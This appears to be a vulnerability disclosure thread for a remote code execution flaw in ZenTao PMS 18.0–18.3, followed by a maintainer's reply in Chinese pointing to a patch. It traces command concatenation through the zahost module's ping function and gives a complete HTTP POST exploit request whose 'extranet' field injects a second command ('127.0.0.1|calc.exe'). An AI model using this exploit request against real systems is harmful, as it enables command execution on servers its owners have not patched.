v18.0~18.3 backstage Remote code execution

[penson233]

38/5000

it found by Chaitin Tech

Command concatenation exists in the ping function of module/zahost/model.php

Calling procedure control::create()->model::create()->model::checkAddress()->model::ping()->exec() control::update()->model::update()->model::checkAddress()->model::ping()->exec()

Exp:

POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/zentaopms/www/index.php?m=zahost&f=create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 134
Origin: http://127.0.0.1
Connection: close
Cookie: zentaosid=dhjpu2i3g51l6j5eba85aql27f; lang=zh-cn; device=desktop; theme=default; tab=qa; windowWidth=1632; windowHeight=783
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za

[sy-records]

补丁已经发布在禅道官网，链接为 https://www.zentao.net/extension-buyExt-1152-download.html ，用户可登陆禅道官网进行下载。在禅道后台安装补丁即可。